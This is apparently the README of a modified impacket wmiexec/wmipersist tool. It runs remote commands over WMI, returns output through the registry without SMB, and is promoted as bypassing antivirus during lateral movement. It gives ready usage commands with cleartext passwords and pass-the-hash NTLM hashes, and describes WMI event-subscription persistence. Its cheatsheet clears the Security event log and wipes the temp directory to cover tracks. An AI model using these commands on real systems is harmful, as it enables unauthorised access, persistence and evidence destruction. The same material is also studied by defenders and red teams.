/wmiexec-RegOut

Modify version of impacket wmiexec.py, get output(data,response) from registry, don't need SMB connection, also bypassing antivirus-software in lateral movement like WMIHACKER.

Primary LanguagePython

wmiexec-RegOut

Modify version of impacket wmiexec.py,wmipersist.py. Got output(data,response) from registry, don't need SMB connection, but I'm in the bad code :(

Table of content

Specially Thanks to:

Overview

In original wmiexec.py, it get response from smb connection (port 445,139). Unfortunately, some antivirus software are monitoring these ports as high risk.
In this case, I drop smb connection function and use others method to execute command.

  • wmiexec-reg-sch-UnderNT6-wip.py: Executed command by using win32-scheduledjob class. According to xiangshan, win32-scheduledjob class only works under windows NT6 (windows-server 2003).
    BTW, win32_scheduledjob has been disabled by default after windows NT6. Here is the way how to enable it.
Key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\Configuration 
Name: EnableAt 
Type: REG_DWORD
Value: 1
  • wmipersist-wip.py (Highly recommend, !!!only works on impacket v0.9.24!!!): A Python version of WMIHACKER, which I picked the vbs template from it. Attacker can use it to do lateral movement safety under antivirus-software running.

  • wmiexec-regOut.py: Just a simple Win32_Process.create method example .

How it works?

  • wmiexec-wip.py workflow:

    Step 1:

    • WMIC authenticated remotly

    Step 2:

    • Use win32process class and call create method to execute command. Then, write down the result into C:\windows\temp directory named [uuid].txt

    Step 3:

    • Encode the file content to base64 strings (need to wait a few seconds)

    Step 4:

    • Add the converted base64 string into registry, and key name call [uuid]

    Step 5:

    • Get the base64 strings remotly and decode it locally.
  • wmipersist-wip.py workflow:

    Step 1:

    • Add custom vbs script into ActiveScriptEventConsumer class.

    Step 2:

    • Creating an Event Filter.

    Step 3:

    • Trigger FilterToConsumerBinding class to PWNED!

Requirements

Generally, you just need to install official impacket.

Usage

  • wmiexec-wip.py usage:

    With cleartext password

    python3 wmiexec-reg.py administrator:111qqq...@192.168.10.90 'whoami'

    image

    With NTLM hashes

    python3 wmiexec-reg.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 administrator@192.168.10.90 'whoami'

    image

  • wmipersist-wip.py usage (Default is no output):

    With cleartext password (without output)

    python3 wmipersist-wip.py administrator:111qqq...@192.168.10.20 'command'

    image

    With NTLM hashes

    python3 wmipersist-wip.py -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 administrator@192.168.10.90 'whoami'

    image

    With output

    python3 wmipersist-wip.py administrator:111qqq...@192.168.1.20 "whoami /priv" -with-output
    python3 wmipersist-wip.py administrator@192.168.1.20 "whoami /priv" -hashes e91d2eafde47de62c6c49a012b3a6af1:e91d2eafde47de62c6c49a012b3a6af1 -with-output

    image image

    Under Huorong antivirus-software (Using WMIHACKER VBS template!!!) 2ef86c8d934dc45498478aa9aedd91c

Cheatsheet

  • Do not forget to clean up temp directory after run command with out put.
    Command: del /q /f /s C:\windows\temp\*
    image

  • Command include double quotes.
    Make double quotes inside single quotes wevtutil cl '"security"'
    image

Todo

  • Optimize code (In bad code now.)
  • Add more functions

References